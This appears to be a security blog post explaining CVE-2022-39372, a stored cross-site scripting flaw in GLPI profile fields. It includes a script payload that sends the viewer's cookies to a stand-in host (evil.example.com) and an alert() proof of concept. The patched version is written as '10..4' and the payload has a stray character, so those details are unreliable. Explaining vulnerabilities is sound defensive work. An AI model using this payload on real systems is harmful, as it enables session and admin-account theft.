GLPI (Gestionnaire Libre de Parc Informatique) is popular open-source software for managing IT assets, tracking software licenses, and handling IT support tickets. If you manage IT assets in your company, there’s a good chance you use or know about GLPI. But in 2022, a serious vulnerability was discovered that impacts users and organizations relying on this platform: CVE-2022-39372.
In this exclusive post, we’ll break down what this bug is, how it can be exploited, demonstrate it with simple code, and explain what you should do right now to protect yourself.
What is CVE-2022-39372?
CVE-2022-39372 is a stored cross-site scripting (XSS) vulnerability found in GLPI before version 10..4. The flaw allows an authenticated user to inject malicious scripts directly into their account information. Whenever an admin or another user views that user’s profile or its information, the embedded script runs in their browser, leading to all sorts of attacks such as session hijacking, credential theft, or even carrying out unwanted actions on the victim’s behalf.
Official References
- CVE Details Entry
- GLPI Security Advisory
The attacker logs in to GLPI (they only need basic user access, not admin).
2. They update their own profile details – such as their name or address – but instead of normal text, they add a malicious script. For example:
`html
alert('XSS by John Doe')
At some point, an admin or another user with privilege reviews or edits the attacker's profile.
4. As soon as the malicious field is loaded in their browser, the script executes, giving the attacker access to the victim’s session, cookies, or data.
Example Exploit
Let’s look at what an attacker would actually do.
Suppose the attacker navigates to their profile update page and enters this into the Name field
<script>fetch('https://evil.example.com/steal?cookie='; + document.cookie)</script>
Step 2: Malicious Code is Stored
GLPI, in versions before 10..4, did not properly sanitize or encode this input. So the malicious code is saved, just like a regular name.
Step 3: Admin Visits Attacker’s Profile
When an admin later views this account – perhaps to reset a password or check a support ticket – the browser loads the profile page, runs the malicious code immediately, and leaks sensitive session data.
Here’s a quick proof-of-concept (PoC) you can test (ONLY on a safe testing server!)
<!-- Enter this into any text field in your user profile -->
<script>alert(document.domain);</script>
After you save the profile and an admin clicks to view your account, they’ll see a popup revealing the domain. In targeted attacks, this could easily be something more dangerous, like session stealing or redirecting the admin.
Why is This a Big Deal?
- Admin Takeover: If an attacker can grab an admin’s session, they could gain unrestricted access to all IT assets and user data.
IT Disruption: XSS can be used for ransomware deployments or to spread malware to other users.
- Compliance Violations: For companies under regulations like HIPAA, GDPR, or PCI-DSS, breaches like this can result in severe penalties.
Mitigation: How Do I Fix This?
The only way to stay protected is to upgrade to GLPI version 10..4 or above. GLPI patched the bug by properly sanitizing user inputs on all profile fields.
> There are no known workarounds – the vulnerability is embedded at the application layer, so web server or browser settings won’t provide sufficient protection.
- GLPI Download Page
- Check the release notes for 10..4
[ ] Consider reviewing your user profiles for any suspicious scripts or strange input.
- [ ] Instruct your admins and users to avoid clicking on suspicious links or profiles until upgrade is complete.
Final Thoughts
GLPI is a powerful tool for IT management, but like any software, it can have vulnerabilities. CVE-2022-39372 serves as a strong reminder to keep your critical systems up-to-date and to educate users about security best practices.
Upgrade now, and stay secure!
*If you found this useful or want to share your experience, leave a comment below or follow for more updates on open-source security.*
Timeline
Published on: 11/03/2022 16:15:00 UTC
Last modified on: 11/03/2022 18:56:00 UTC